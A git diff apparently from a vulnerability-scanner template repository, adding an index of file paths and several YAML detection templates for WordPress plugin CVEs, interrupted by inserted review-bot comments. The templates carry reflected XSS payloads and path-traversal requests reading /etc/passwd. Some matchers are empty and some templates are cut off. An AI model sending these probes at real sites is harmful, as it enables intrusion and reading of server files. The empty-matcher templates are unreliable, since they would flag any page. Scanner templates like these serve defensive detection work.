diff --git a/date.txt b/date.txt
index a611dd4894..f4039d392c 100644
--- a/date.txt
+++ b/date.txt
@@ -1 +1 @@
-20241207
+20241208
diff --git a/poc.txt b/poc.txt
index cb2e350082..5559c16fcc 100644
--- a/poc.txt
+++ b/poc.txt
@@ -9379,6 +9379,7 @@
 ./poc/cve/CVE-2012-4033.yaml
 ./poc/cve/CVE-2012-4226-fa09b7f54fa1dd8f41345d33cd119a7e.yaml
 ./poc/cve/CVE-2012-4226.yaml
+./poc/cve/CVE-2012-4242-2185.yaml
 ./poc/cve/CVE-2012-4242-2188.yaml
 ./poc/cve/CVE-2012-4242-ad8105428e239327d370c7e6d993aab5.yaml
 ./poc/cve/CVE-2012-4242.yaml
@@ -9394,6 +9395,7 @@
 ./poc/cve/CVE-2012-4272-be8ad5d2a33e00e145c6c6d44c6091d7.yaml
 ./poc/cve/CVE-2012-4272.yaml
 ./poc/cve/CVE-2012-4273-2194.yaml
+./poc/cve/CVE-2012-4273-2195.yaml
 ./poc/cve/CVE-2012-4273-2198.yaml
 ./poc/cve/CVE-2012-4273-60f2c9c88ca63cf1daa993ad4a08d418.yaml
 ./poc/cve/CVE-2012-4273.yaml
@@ -10380,6 +10382,7 @@
 ./poc/cve/CVE-2014-4939-bf7b531fae1dcfdfe3627d9403f862bf.yaml
 ./poc/cve/CVE-2014-4939.yaml
 ./poc/cve/CVE-2014-4940-2382.yaml
+./poc/cve/CVE-2014-4940-2384.yaml
 ./poc/cve/CVE-2014-4940-2385.yaml
 ./poc/cve/CVE-2014-4940-43748e45f4cf7db5084c38897ab37317.yaml
 ./poc/cve/CVE-2014-4940.yaml
@@ -10814,6 +10817,7 @@
 ./poc/cve/CVE-2015-1000010.yaml
 ./poc/cve/CVE-2015-1000011-6ef8738040302a74ae4f4262e6a4cba3.yaml
 ./poc/cve/CVE-2015-1000011.yaml
+./poc/cve/CVE-2015-1000012-2457.yaml
 ./poc/cve/CVE-2015-1000012-2458.yaml
 ./poc/cve/CVE-2015-1000012-2460.yaml
 ./poc/cve/CVE-2015-1000012-2461.yaml
@@ -11850,6 +11854,7 @@
 ./poc/cve/CVE-2016-1000126-30945a13785775ff2a15985cf5c40b39.yaml
 ./poc/cve/CVE-2016-1000126.yaml
 ./poc/cve/CVE-2016-1000127-2644.yaml
+./poc/cve/CVE-2016-1000127-2646.yaml
 ./poc/cve/CVE-2016-1000127-2647.yaml
 ./poc/cve/CVE-2016-1000127-5d15dee6dbe4e10317fdcb5b87ac684a.yaml
 ./poc/cve/CVE-2016-1000127.yaml
@@ -11949,6 +11954,7 @@
 ./poc/cve/CVE-2016-1000152.yaml
 ./poc/cve/CVE-2016-1000153-2733.yaml
 ./poc/cve/CVE-2016-1000153-2735.yaml
+./poc/cve/CVE-2016-1000153-2736.yaml
 ./poc/cve/CVE-2016-1000153-de892b497579d25c72a68ec08f4653ec.yaml
 ./poc/cve/CVE-2016-1000153.yaml
 ./poc/cve/CVE-2016-1000154-2737.yaml
@@ -14229,6 +14235,7 @@
 ./poc/cve/CVE-2019-14205 (copy 2).yaml
 ./poc/cve/CVE-2019-14205 2.yaml
 ./poc/cve/CVE-2019-14205-098c82f7405a94e86794e799d21c1cc9.yaml
+./poc/cve/CVE-2019-14205-3823.yaml
 ./poc/cve/CVE-2019-14205-3827.yaml
 ./poc/cve/CVE-2019-14205.yaml
 ./poc/cve/CVE-2019-14206-16b211e0a341fd7a3b47a5ac194b810e.yaml
@@ -16534,6 +16541,7 @@
 ./poc/cve/CVE-2021-24175.yaml
 ./poc/cve/CVE-2021-24176-5632.yaml
 ./poc/cve/CVE-2021-24176-5634.yaml
+./poc/cve/CVE-2021-24176-5636.yaml
 ./poc/cve/CVE-2021-24176-5637.yaml
 ./poc/cve/CVE-2021-24176-897532800150bcb7077f612cb260b674.yaml
 ./poc/cve/CVE-2021-24176.yaml
@@ -16918,6 +16926,7 @@
 ./poc/cve/CVE-2021-24341.yaml
 ./poc/cve/CVE-2021-24342-074bf64cb028087442f7a1ccad7aa166.yaml
 ./poc/cve/CVE-2021-24342-5713.yaml
+./poc/cve/CVE-2021-24342-5715.yaml
 ./poc/cve/CVE-2021-24342.yaml
 ./poc/cve/CVE-2021-24343-9f42b99bff397ce305a84405d05da54c.yaml
 ./poc/cve/CVE-2021-24343.yaml
@@ -19896,6 +19905,7 @@
 ./poc/cve/CVE-2022-0420.yaml
 ./poc/cve/CVE-2022-0421-c065c35c2799effc1f77319c878c3214.yaml
 ./poc/cve/CVE-2022-0421.yaml
+./poc/cve/CVE-2022-0422(1).yaml
 ./poc/cve/CVE-2022-0422-af03e6837ec88ed4891cf93143a78408.yaml
 ./poc/cve/CVE-2022-0422.yaml
 ./poc/cve/CVE-2022-0423-e0cf21ac7a9cbe934922bbf95506b03b.yaml
@@ -34511,6 +34521,7 @@
 ./poc/cve/CVE-2024-10045-b4e327038c9d97f0951cbe31ae85ae95.yaml
 ./poc/cve/CVE-2024-10045.yaml
 ./poc/cve/CVE-2024-10046-58130bbbe77191649997e6898ed33238.yaml
+./poc/cve/CVE-2024-10046.yaml
 ./poc/cve/CVE-2024-10048-b98a29a036ced771c9bb009b9895710a.yaml
 ./poc/cve/CVE-2024-10048.yaml
 ./poc/cve/CVE-2024-10049-5634711959b0699a5bdae8c67ef9be92.yaml
@@ -35132,6 +35143,7 @@
 ./poc/cve/CVE-2024-11009-550f0a103f6e5df20eeae8b67792bff7.yaml
 ./poc/cve/CVE-2024-11009.yaml
 ./poc/cve/CVE-2024-11010-7519a29fa5d8193b924c132cd64d9dbf.yaml
+./poc/cve/CVE-2024-11010.yaml
 ./poc/cve/CVE-2024-11024-47f8599da025c3dd9d60a7fed198eb3e.yaml
 ./poc/cve/CVE-2024-11024.yaml
 ./poc/cve/CVE-2024-11028-be11a59cf40f1f75ac81807f970e31ef.yaml
@@ -35291,6 +35303,7 @@
 ./poc/cve/CVE-2024-11326-0c8fabfd859db33f6ff486f4e38a0506.yaml
 ./poc/cve/CVE-2024-11326.yaml
 ./poc/cve/CVE-2024-11329-f4a6dd5bf508f9d3296e0c4d117e8f7b.yaml
+./poc/cve/CVE-2024-11329.yaml
 ./poc/cve/CVE-2024-1133-5aaf4a16979d2f881469e06c92325e8d.yaml
 ./poc/cve/CVE-2024-1133.yaml
 ./poc/cve/CVE-2024-11330-fd1fc6fe3457cdd01c56d0c2ac10a22f.yaml
@@ -35314,6 +35327,7 @@
 ./poc/cve/CVE-2024-11352-2956a03392350547f722d5c5b1052818.yaml
 ./poc/cve/CVE-2024-11352.yaml
 ./poc/cve/CVE-2024-11353-46013ef48c10e8c9ce8df577a52a29bc.yaml
+./poc/cve/CVE-2024-11353.yaml
 ./poc/cve/CVE-2024-11354-0e62ca18f9bdb0611f368a7276263f85.yaml
 ./poc/cve/CVE-2024-11354.yaml
 ./poc/cve/CVE-2024-11355-edf82e64900042596ef0c5f92c74100e.yaml
@@ -35332,6 +35346,7 @@
 ./poc/cve/CVE-2024-11366-cc7c5723ad039e93a1f894e0ec9c21a6.yaml
 ./poc/cve/CVE-2024-11366.yaml
 ./poc/cve/CVE-2024-11367-4392dd5590d051190c7b848c08c2e24d.yaml
+./poc/cve/CVE-2024-11367.yaml
 ./poc/cve/CVE-2024-11368-4f78bcb719a028575fa2e8dc0ead82a6.yaml
 ./poc/cve/CVE-2024-11368.yaml
 ./poc/cve/CVE-2024-11370-8905f30acaa5202d5d378bf4d5583236.yaml
@@ -35340,9 +35355,11 @@
 ./poc/cve/CVE-2024-11371-95a048e99cf0968d3759cd47fec02e09.yaml
 ./poc/cve/CVE-2024-11371.yaml
 ./poc/cve/CVE-2024-11374-5e058c4cfdb79709cb4c1958dcfa10ca.yaml
+./poc/cve/CVE-2024-11374.yaml
 ./poc/cve/CVE-2024-11379-039fa25f860d0b73f90d1c2ba7698bfc.yaml
 ./poc/cve/CVE-2024-11379.yaml
 ./poc/cve/CVE-2024-11380-827eb566b7e0140da5bc0bdff9496148.yaml
+./poc/cve/CVE-2024-11380.yaml
 ./poc/cve/CVE-2024-11381-4ba6eeaab054e0e01702e7251bb00372.yaml
 ./poc/cve/CVE-2024-11381.yaml
 ./poc/cve/CVE-2024-11385-43829d07561569d5ecaceb7ea47ba97c.yaml
@@ -35391,6 +35408,7 @@
 ./poc/cve/CVE-2024-11435-295c6f456e7c23cf3678b8d2ff5718f3.yaml
 ./poc/cve/CVE-2024-11435.yaml
 ./poc/cve/CVE-2024-11436-f42166b559af8c596bb7bd6baf4bea0a.yaml
+./poc/cve/CVE-2024-11436.yaml
 ./poc/cve/CVE-2024-11438-466e48b3dc4ddb929568c36634c56fb1.yaml
 ./poc/cve/CVE-2024-11438.yaml
 ./poc/cve/CVE-2024-11440-b26a27e98ac4778bf1db64f0d89b26d0.yaml
@@ -35404,6 +35422,7 @@
 ./poc/cve/CVE-2024-11450-aa0eea523b63076daf425f6ddb400979.yaml
 ./poc/cve/CVE-2024-11450.yaml
 ./poc/cve/CVE-2024-11451-efa8bab249d4c41a9a195e0192e63d9d.yaml
+./poc/cve/CVE-2024-11451.yaml
 ./poc/cve/CVE-2024-11453-fa7409a899cdcce4323f76f911032569.yaml
 ./poc/cve/CVE-2024-11453.yaml
 ./poc/cve/CVE-2024-11455-20245b95e832be32aa78c5dcdb250fbb.yaml
@@ -35412,6 +35431,7 @@
 ./poc/cve/CVE-2024-11456-1c20e0d56bf66bc1f213217d116132ca.yaml
 ./poc/cve/CVE-2024-11456.yaml
 ./poc/cve/CVE-2024-11457-1fb447159a76a7d90af6bcf11c77f7bb.yaml
+./poc/cve/CVE-2024-11457.yaml
 ./poc/cve/CVE-2024-11458-06c2883fbed5c08d970a9ed931a3e19e.yaml
 ./poc/cve/CVE-2024-11458.yaml
 ./poc/cve/CVE-2024-11460-54390097dc3ed52a0207a2b2c6c9909f.yaml
@@ -35421,9 +35441,11 @@
 ./poc/cve/CVE-2024-11463-0bf104abede23adeb8af80d1e15ce8a5.yaml
 ./poc/cve/CVE-2024-11463.yaml
 ./poc/cve/CVE-2024-11464-e3ddfb3c3eeafb3077e966e3de489912.yaml
+./poc/cve/CVE-2024-11464.yaml
 ./poc/cve/CVE-2024-11466-72daf3a307a80f4554dc36ae480bafa0.yaml
 ./poc/cve/CVE-2024-11466.yaml
 ./poc/cve/CVE-2024-11501-6648e003ce861122d6bdf36694ec0ac2.yaml
+./poc/cve/CVE-2024-11501.yaml
 ./poc/cve/CVE-2024-1157-d2b245ef8566e249301cbac489385050.yaml
 ./poc/cve/CVE-2024-1157.yaml
 ./poc/cve/CVE-2024-1158-c524eecd9e35e784bb852f087dadba65.yaml
@@ -35533,6 +35555,7 @@
 ./poc/cve/CVE-2024-11903-fe2ae85697a23f24ded288f0b3d83370.yaml
 ./poc/cve/CVE-2024-11903.yaml
 ./poc/cve/CVE-2024-11904-5fe3b58edbf68a55952920a93fb3f296.yaml
+./poc/cve/CVE-2024-11904.yaml
 ./poc/cve/CVE-2024-11918-095887b4ec8bd9bbd522023a03b46270.yaml
 ./poc/cve/CVE-2024-11918.yaml
 ./poc/cve/CVE-2024-11925-7672d2ec8fe92df70998a26a9cf9b901.yaml
@@ -35540,11 +35563,13 @@
 ./poc/cve/CVE-2024-11935-088fa6aefbb99715a7cda0aadf2f36df.yaml
 ./poc/cve/CVE-2024-11935.yaml
 ./poc/cve/CVE-2024-11943-9cc06cbd2cda10ebe942d226be8a34ce.yaml
+./poc/cve/CVE-2024-11943.yaml
 ./poc/cve/CVE-2024-11952-16ad33d112d4e8604b5e9b540af90fd8.yaml
 ./poc/cve/CVE-2024-11952.yaml
 ./poc/cve/CVE-2024-12003-f77c04413b23540455a2432d7e006cc4.yaml
 ./poc/cve/CVE-2024-12003.yaml
 ./poc/cve/CVE-2024-12026-048d32aed4281761d7c921ef3e5b09bc.yaml
+./poc/cve/CVE-2024-12026.yaml
 ./poc/cve/CVE-2024-12027-ac20a46df6a7bc7dc3fb76e961264ae6.yaml
 ./poc/cve/CVE-2024-12027.yaml
 ./poc/cve/CVE-2024-12028-743f7fbc736d510f8f41d855806fd00b.yaml
@@ -35574,8 +35599,10 @@
 ./poc/cve/CVE-2024-12110-a525586ff802b7e30487eba9d47bf8aa.yaml
 ./poc/cve/CVE-2024-12110.yaml
 ./poc/cve/CVE-2024-12115-3d071505c2ef1942d31e62067bb7b342.yaml
+./poc/cve/CVE-2024-12115.yaml
 ./poc/cve/CVE-2024-1212.yaml
 ./poc/cve/CVE-2024-12128-5b31f632a2dbc3187253dd9153d43eba.yaml
+./poc/cve/CVE-2024-12128.yaml
 ./poc/cve/CVE-2024-1213-387a75cacd130bdeb2c4a34a4e878883.yaml
 ./poc/cve/CVE-2024-1213.yaml
 ./poc/cve/CVE-2024-1214-054ce8e16369a5701a550443d837348b.yaml
@@ -35583,17 +35610,24 @@
 ./poc/cve/CVE-2024-12155-7dae1ca184aa2d7a98e91ae763450832.yaml
 ./poc/cve/CVE-2024-12155.yaml
 ./poc/cve/CVE-2024-12165-eedc303e6795f6150a7b4fb4301920b9.yaml
+./poc/cve/CVE-2024-12165.yaml
 ./poc/cve/CVE-2024-12166-6e2be28a8c3bf8f7705203d8c2885904.yaml
+./poc/cve/CVE-2024-12166.yaml
 ./poc/cve/CVE-2024-12167-3243c43b67568fda5b299414a4b2b1aa.yaml
+./poc/cve/CVE-2024-12167.yaml
 ./poc/cve/CVE-2024-1217-e1f7e39e09d8b79f70c462087458d021.yaml
 ./poc/cve/CVE-2024-1217.yaml
 ./poc/cve/CVE-2024-1218-b64b71b9fc6a036f1598c987aa88895e.yaml
 ./poc/cve/CVE-2024-1218.yaml
 ./poc/cve/CVE-2024-1219-bc57ce19d5d43bbc7836b1cbd8ef2eec.yaml
 ./poc/cve/CVE-2024-1219.yaml
+./poc/cve/CVE-2024-12209-6ec7c164fe320907f155f71f239635b3.yaml
 ./poc/cve/CVE-2024-12253-c678eb115eb7d6bb53d9036495534285.yaml
+./poc/cve/CVE-2024-12253.yaml
 ./poc/cve/CVE-2024-12257-7d0fe0e508be4c5905b56491ebe3c6ea.yaml
+./poc/cve/CVE-2024-12257.yaml
 ./poc/cve/CVE-2024-12270-452333282a2aa14ca2b9778df2f2339d.yaml
+./poc/cve/CVE-2024-12270.yaml
 ./poc/cve/CVE-2024-1229-c6d7bb9ffd8a626f74b1cf581ee631f7.yaml
 ./poc/cve/CVE-2024-1229.yaml
 ./poc/cve/CVE-2024-1230-c16c6920d1a9d323e3888c155daedfe0.yaml
@@ -47526,6 +47560,7 @@
 ./poc/cve/CVE-2024-7892-a0d1694b509e866d180f36d7f175fd8a.yaml
 ./poc/cve/CVE-2024-7892.yaml
 ./poc/cve/CVE-2024-7894-c990ef07d46ce485400718766ec348bc.yaml
+./poc/cve/CVE-2024-7894.yaml
 ./poc/cve/CVE-2024-7895-ac1e11d6be8490c8494a930a375e9a8e.yaml
 ./poc/cve/CVE-2024-7895.yaml
 ./poc/cve/CVE-2024-7918-a7e65e7119ee7b26b163171cf42cfe15.yaml
@@ -47877,6 +47912,7 @@
 ./poc/cve/CVE-2024-8678-32701a61a4be69d268e5913bb7dadd3d.yaml
 ./poc/cve/CVE-2024-8678.yaml
 ./poc/cve/CVE-2024-8679-d012f7b0feca7488fa920d9da71457d9.yaml
+./poc/cve/CVE-2024-8679.yaml
 ./poc/cve/CVE-2024-8680-66081216a3685413779cdd14f0f9fe12.yaml
 ./poc/cve/CVE-2024-8680.yaml
 ./poc/cve/CVE-2024-8681-8fc56993d1c07dd1495b80fa682fab16.yaml
@@ -84373,6 +84409,7 @@
 ./poc/other/beanstalk-service.yaml
 ./poc/other/beast2.yaml
 ./poc/other/beautiful-taxonomy-filters-1a256bdd1513f2507d8de67d68254885.yaml
+./poc/other/beautiful-taxonomy-filters.yaml
 ./poc/other/beauty-af9641ba5dc553a449654ef14a59f791.yaml
 ./poc/other/beauty-premium-5daae5daa6880f8a3ebf5f7b2a3f1a04.yaml
 ./poc/other/beauty-premium.yaml
@@ -86565,6 +86602,7 @@
 ./poc/other/cf7-message-filter-c1a17d8e31627d5c93bdc282adcf65c6.yaml
 ./poc/other/cf7-message-filter.yaml
 ./poc/other/cf7-mollie-df7c6abf26bb0d9acd31d6d0e3d1fe21.yaml
+./poc/other/cf7-mollie.yaml
 ./poc/other/cf7-multi-step-dc451ec0e984e189bd60b12f2825ad31.yaml
 ./poc/other/cf7-multi-step.yaml
 ./poc/other/cf7-repeatable-fields.yaml
@@ -87086,6 +87124,7 @@
 ./poc/other/clickfunnels.yaml
 ./poc/other/clickjacking.yaml
 ./poc/other/clicksend-lead-capture-form-2013d5c3654ad4436f800e5050425673.yaml
+./poc/other/clicksend-lead-capture-form.yaml
 ./poc/other/clickshare_cs-100_huddle_firmware.yaml
 ./poc/other/clicky-357dda116c9349ad73f3f8c0c8e4a868.yaml
 ./poc/other/clicky-560dc6864f6fa8907eb756d22c0c6f85.yaml
@@ -87516,6 +87555,7 @@
 ./poc/other/combodo-itop-installer.yaml
 ./poc/other/comcast-business.yaml
 ./poc/other/comexe-ras.yaml
+./poc/other/comfino-payment-gateway.yaml
 ./poc/other/comic-easel.yaml
 ./poc/other/comicbookmanagementsystemweeklypicks-0f5c8320e798e6cafa6769f8fac1dd17.yaml
 ./poc/other/comicbookmanagementsystemweeklypicks.yaml
@@ -91046,6 +91086,7 @@
 ./poc/other/editorialmag-3bb6d7f8c1ce41332e68bc8cb1fb99e2.yaml
 ./poc/other/editorialmag.yaml
 ./poc/other/edk.yaml
+./poc/other/edoc-easy-tables.yaml
 ./poc/other/edoc-employee-application-b0fbb8f06b94fd224b3fa5e75ee98d67.yaml
 ./poc/other/edoc-employee-application.yaml
 ./poc/other/edoc.yaml
@@ -94794,6 +94835,7 @@
 ./poc/other/gixaw-chat-d377df2c73c02f3f079775b56eb84c7c.yaml
 ./poc/other/gixaw-chat.yaml
 ./poc/other/gkrellm.yaml
+./poc/other/gl-ar300m_firmware.yaml
 ./poc/other/glass-b3268283daf190fd77277f208bd83ee4.yaml
 ./poc/other/glass-malware.yaml
 ./poc/other/glass.yaml
@@ -98561,6 +98603,7 @@
 ./poc/other/library-bookshelves-f6b62efe8fc1a945d136d2024b30793d.yaml
 ./poc/other/library-bookshelves.yaml
 ./poc/other/library-management-system-258e017dc592b5e0b4705087c287cd24.yaml
+./poc/other/library-management-system.yaml
 ./poc/other/library-viewer-ad379bf851018a949a2e8d9f80ea5c4a.yaml
 ./poc/other/library-viewer-b763b4fac265b393ce11f0636da63c04.yaml
 ./poc/other/library-viewer.yaml
@@ -100952,6 +100995,7 @@
 ./poc/other/multi-feed-reader-8f17cacb6f8c5e60292b0dd3859393d3.yaml
 ./poc/other/multi-feed-reader.yaml
 ./poc/other/multi-gallery-0b7e3d5e1ae64cd7a19df12119f75219.yaml
+./poc/other/multi-gallery.yaml
 ./poc/other/multi-meta-box-7c92850f76882fd2a11570606d0c8ea5.yaml
 ./poc/other/multi-meta-box-bf3cf205d3d4ce7c171081c9dfe27c52.yaml
 ./poc/other/multi-meta-box-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -109181,6 +109225,7 @@
 ./poc/other/smoothscroller-b97a1843450f4f1dcaeec794659eed9c.yaml
 ./poc/other/smoothscroller.yaml
 ./poc/other/smoove-elementor-892da9cf627aa96f4c780b708515a074.yaml
+./poc/other/smoove-elementor.yaml
 ./poc/other/smpl-shortcodes-e69c558e1ddd33a09346202334d228be.yaml
 ./poc/other/smpl-shortcodes.yaml
 ./poc/other/smugmug.yaml
@@ -110441,6 +110486,7 @@
 ./poc/other/swift-performance-lite-9d1b83ae9017d2fadd1702f8770861b6.yaml
 ./poc/other/swift-performance-lite-ff16d085629ee3b61efab5d02050c62e.yaml
 ./poc/other/swift-performance-lite.yaml
+./poc/other/swift_performance_lite.yaml
 ./poc/other/swifty-bar-55e944853212366688eada78aebb13f0.yaml
 ./poc/other/swifty-bar.yaml
 ./poc/other/swifty-page-manager-125ba6d5368bb43e9932c9d58fc08007.yaml
@@ -116273,6 +116319,7 @@
 ./poc/other/zoom-phish.yaml
 ./poc/other/zoomitir.yaml
 ./poc/other/zoommeeting.yaml
+./poc/other/zooom.yaml
 ./poc/other/zope.yaml
 ./poc/other/zopim-live-chat-772dea4c5c0f7c77cb8ca4d08a21143a.yaml
 ./poc/other/zopim-live-chat.yaml
@@ -130350,6 +130397,7 @@
 ./poc/sql/wp-gpx-maps-0d9a1e75d08df9ec9ff58db5271ee389.yaml
 ./poc/sql/wp-graphql-60429422ecdbfe1e7baa2c63158e03f3.yaml
 ./poc/sql/wp-gratify-6477bf18cad6c823db485408d49b337b.yaml
+./poc/sql/wp-health-13e7f9c38c97fef1a7e5dbdde401c273.yaml
 ./poc/sql/wp-hide-pages-ebeced906f02d5af5f39e7c598c4dbe3.yaml
 ./poc/sql/wp-hide-post-2ef388f09bdbf3112427840fe6ddb7e9.yaml
 ./poc/sql/wp-homepage-slideshow-3ac3074835719ac29fdb4081e5eb9638.yaml
@@ -139293,6 +139341,7 @@
 ./poc/wordpress/wp-haberadam-idor.yaml
 ./poc/wordpress/wp-header-images-778b726247bbcead8f63ba72f803b4d7.yaml
 ./poc/wordpress/wp-header-images.yaml
+./poc/wordpress/wp-health-13e7f9c38c97fef1a7e5dbdde401c273.yaml
 ./poc/wordpress/wp-helper-lite-51ceed56d70da3ede0b63b57ea323f11.yaml
 ./poc/wordpress/wp-helper-lite-812f4d12e6825238d498f82eea80f495.yaml
 ./poc/wordpress/wp-helper-lite-87ee63b2a0716467279341dc65787764.yaml
@@ -140037,6 +140086,7 @@ ./poc/wordpress/wp-migration-duplicator-cc58613e8ec313ae53842602ce5cc591.yaml ./poc/wordpress/wp-migration-duplicator.yaml ./poc/wordpress/wp-mini-program-7610a9dcc02af3778b2d529500591729.yaml +./poc/wordpress/wp-mini-program.yaml ./poc/wordpress/wp-miniaudioplayer-4b9a713e7c89801670825b87bc593b2d.yaml ./poc/wordpress/wp-miniaudioplayer-8d223cc46413d4a2325246f5d13091fe.yaml ./poc/wordpress/wp-miniaudioplayer-9439fc79c484607a830430ba4dc0941c.yaml diff --git a/poc/cve/CVE-2012-4242-2185.yaml b/poc/cve/CVE-2012-4242-2185.yaml new file mode 100644 index 0000000000..0c1f535b27 --- /dev/null +++ b/poc/cve/CVE-2012-4242-2185.yaml @@ -0,0 +1,30 @@ +id: CVE-2012-4242 + +info: + name: WordPress Plugin MF Gig Calendar 0.9.2 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4242 + + description: "Cross-site scripting (XSS) vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page." + +requests: + - method: GET + path: + - '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2012-4273-2195.yaml b/poc/cve/CVE-2012-4273-2195.yaml new file mode 100644 index 0000000000..bacae8d717 --- /dev/null +++ b/poc/cve/CVE-2012-4273-2195.yaml 
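Review bot: The body matcher in the CVE-2012-4242-2185 template is `words: - ""`, and every response contains the empty string, so the condition collapses to status 200 plus a text/html header and the template will report any reachable page as vulnerable. The matcher should name the exact reflected string that distinguishes a vulnerable response (the value may have been stripped when this page was rendered — compare against the stored file), or be removed so the matcher set does not claim more than it actually checks. The same empty word matcher is in the CVE-2012-4273-2195, CVE-2016-1000127-2646, CVE-2016-1000153-2736 and CVE-2021-24342-5715 hunks, and in the last one the POST body `lang=en_US&cat_id=6">&action=...` also looks cut off at the same point. This template, CVE-2012-4273-2195 and CVE-2021-24342-5715 also carry no `tags:` key, so a tag-filtered run (e.g. `cve`, `wordpress`, `xss`) would not select them while the other templates in this commit are selected.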
@@ -0,0 +1,30 @@ +id: CVE-2012-4273 + +info: + name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting (XSS) + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4273 + + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2014-4940-2384.yaml b/poc/cve/CVE-2014-4940-2384.yaml new file mode 100644 index 0000000000..a2d4666d76 --- /dev/null +++ b/poc/cve/CVE-2014-4940-2384.yaml @@ -0,0 +1,25 @@ +id: CVE-2014-4940 + +info: + name: WordPress Plugin Tera Charts - Directory Traversal + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php. + reference: https://www.cvedetails.com/cve/CVE-2014-4940 + tags: cve,cve2014,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2015-1000012-2457.yaml b/poc/cve/CVE-2015-1000012-2457.yaml new file mode 100644 index 0000000000..6376589aaf --- /dev/null +++ b/poc/cve/CVE-2015-1000012-2457.yaml 
@@ -0,0 +1,35 @@ +id: CVE-2015-1000012 +info: + name: WordPress MyPixs <=0.3 - Local File Inclusion + author: daffainfo + severity: high + description: WordPress MyPixs 0.3 and prior contains a local file inclusion vulnerability. + reference: + - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 + - http://www.vapidlabs.com/advisory.php?v=154 + - https://nvd.nist.gov/vuln/detail/CVE-2015-1000012 + - http://web.archive.org/web/20210518144916/https://www.securityfocus.com/bid/94495 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2015-1000012 + cwe-id: CWE-200 + metadata: + google-query: inurl:"/wp-content/plugins/mypixs" + tags: cve,cve2015,wordpress,wp-plugin,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/06 diff --git a/poc/cve/CVE-2016-1000127-2646.yaml b/poc/cve/CVE-2016-1000127-2646.yaml new file mode 100644 index 0000000000..51c400aa1e --- /dev/null +++ b/poc/cve/CVE-2016-1000127-2646.yaml 
@@ -0,0 +1,35 @@ +id: CVE-2016-1000127 + +info: + name: AJAX Random Post <= 2.00 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin ajax-random-post v2.00 + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000127 + tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000127 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2016-1000153-2736.yaml b/poc/cve/CVE-2016-1000153-2736.yaml new file mode 100644 index 0000000000..3b55e0bdd3 --- /dev/null +++ b/poc/cve/CVE-2016-1000153-2736.yaml 
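Review bot: `cvss-score: 6.10` is an unquoted YAML float, so the loader reads it as `6.1`; the trailing zero does nothing and differs from the `6.1` / `7.5` form the other templates in this commit use. Write `cvss-score: 6.1` here, and likewise `7.5` for `7.50` in CVE-2019-14205-3823, `5.4` for `5.40` in CVE-2021-24176-5636 and `6.1` for `6.10` in CVE-2021-24342-5715. The one-line `description: Reflected XSS in wordpress plugin ajax-random-post v2.00` could also name the affected parameter (`interval`, already visible in the request path) so the text documents what the check exercises.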
@@ -0,0 +1,39 @@ +id: CVE-2016-1000153 + +info: + name: Tidio Gallery <= 1.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin tidio-gallery v1.1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000153 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=427 + - https://wordpress.org/plugins/tidio-gallery + - http://www.securityfocus.com/bid/93543 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-1000153 + cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + 